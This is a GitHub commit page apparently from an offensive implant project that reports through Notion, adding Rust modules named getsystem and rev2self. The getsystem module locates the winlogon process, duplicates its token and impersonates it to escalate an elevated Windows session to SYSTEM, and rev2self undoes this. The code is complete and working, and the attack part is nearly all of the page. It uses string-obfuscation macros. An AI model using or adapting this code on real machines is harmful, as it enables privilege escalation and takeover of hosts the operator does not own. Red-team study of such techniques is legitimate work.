-
Notifications
You must be signed in to change notification settings - Fork 116
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #117 from mttaggart/taggart
getsystem/rev2self
- Loading branch information
Showing
4 changed files
with
243 additions
and
34 deletions.
There are no files selected for viewing
Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,99 @@ | ||
#[cfg(windows)] use windows::{ | ||
core::{PSTR, PWSTR, PCWSTR}, | ||
Win32::{ | ||
Foundation::{ | ||
CloseHandle, | ||
HANDLE | ||
}, | ||
System::Threading::{ | ||
GetCurrentProcess, | ||
OpenProcessToken, | ||
OpenProcess, | ||
PROCESS_ALL_ACCESS | ||
}, | ||
Security::{ | ||
GetTokenInformation, | ||
DuplicateToken, | ||
ImpersonateLoggedOnUser, | ||
SecurityImpersonation, | ||
TokenElevation, | ||
TOKEN_ELEVATION, | ||
TOKEN_QUERY, | ||
TOKEN_DUPLICATE | ||
} | ||
} | ||
}; | ||
|
||
#[cfg(windows)] use std::mem; | ||
#[cfg(windows)] use std::ffi::c_void; | ||
#[cfg(windows)] use libc; | ||
#[cfg(windows)] use sysinfo::{ProcessExt, PidExt, System, SystemExt, Pid, Process}; | ||
#[cfg(windows)] use whoami; | ||
use std::error::Error; | ||
use litcrypt::lc; | ||
#[cfg(windows)] use crate::cmd::getprivs::is_elevated; | ||
use crate::logger::{Logger, log_out}; | ||
use crate::cmd::notion_out; | ||
|
||
#[cfg(windows)] | ||
fn get_processes(proc_name: &str) -> Vec<(u32, String)> { | ||
let sys = System::new_all(); | ||
sys.processes() | ||
.iter() | ||
.filter(|(_, n) | { | ||
n.name().to_lowercase().contains(proc_name) | ||
}) | ||
.map(|(p, n)| { | ||
(p.as_u32(), n.name().to_owned()) | ||
}) | ||
.collect() | ||
} | ||
|
||
/// Lists processes. Returns PID and process name. | ||
pub async fn handle(logger: &Logger) -> Result<String, Box<dyn Error>> { | ||
#[cfg(windows)] { | ||
if is_elevated() { | ||
unsafe { | ||
logger.info(log_out!("Elevated! Let's get that SYSTEM")); | ||
|
||
let mut winlogon_token_handle = HANDLE(0); | ||
let mut duplicate_token_handle = HANDLE(0); | ||
let winlogon_processes = get_processes("winlogon"); | ||
if winlogon_processes.is_empty() { | ||
return notion_out!("Couldn't find winlogon!"); | ||
} | ||
let winlogon_pid: u32 = winlogon_processes[0].0; | ||
logger.debug(log_out!("Winlogon pid: ", winlogon_pid.to_string().as_str())); | ||
// OpenProcess | ||
let winlogon_proc_handle = OpenProcess(PROCESS_ALL_ACCESS, false, winlogon_pid); | ||
// OpenProcessToken | ||
if OpenProcessToken(winlogon_proc_handle, TOKEN_DUPLICATE, &mut winlogon_token_handle).0 != 0 { | ||
} else { | ||
return notion_out!("[!] Couldn't get Winlogon Token!"); | ||
} | ||
// Duplicate Token | ||
if DuplicateToken(winlogon_token_handle, SecurityImpersonation, &mut duplicate_token_handle).0 != 0 { | ||
logger.debug(log_out!("Duplicated Token!")); | ||
} else { | ||
return notion_out!("[!] Couldn't duplicate token!"); | ||
} | ||
// ImpersonateLoggedOnUser | ||
if ImpersonateLoggedOnUser(duplicate_token_handle).0 != 0 { | ||
logger.info(log_out!("Impersonated!")); | ||
CloseHandle(winlogon_proc_handle); | ||
return notion_out!("I am now ", whoami::username().as_str()); | ||
} | ||
return notion_out!("Couldn't get system!"); | ||
// Close Handles | ||
// CloseHandle(duplicate_token_handle); | ||
|
||
} | ||
|
||
} else { | ||
notion_out!("[!] You ain't got da JUICE!") | ||
} | ||
} | ||
#[cfg(not(windows))] { | ||
notion_out!("This module only works on Windows!") | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
#[cfg(windows)] use windows::{ | ||
Win32::{ | ||
Foundation::{ | ||
BOOL, | ||
}, | ||
Security::{ | ||
RevertToSelf | ||
} | ||
} | ||
}; | ||
#[cfg(windows)] use whoami; | ||
use std::error::Error; | ||
use litcrypt::lc; | ||
use crate::logger::{Logger, log_out}; | ||
use crate::cmd::notion_out; | ||
|
||
/// Reverts to self if impersonated | ||
pub async fn handle() -> Result<String, Box<dyn Error>> { | ||
|
||
#[cfg(windows)] { | ||
let username = whoami::username(); | ||
if username == "SYSTEM" { | ||
unsafe { | ||
if RevertToSelf().0 == 1 { | ||
return notion_out!("Reverted to Self: ", whoami::username().as_str()); | ||
} else { | ||
return notion_out!("Could not revert"); | ||
} | ||
} | ||
} | ||
notion_out!("Not SYSTEM, no reason to revert!") | ||
} | ||
|
||
#[cfg(not(windows))] { | ||
notion_out!("This module only works on Windows!") | ||
} | ||
} |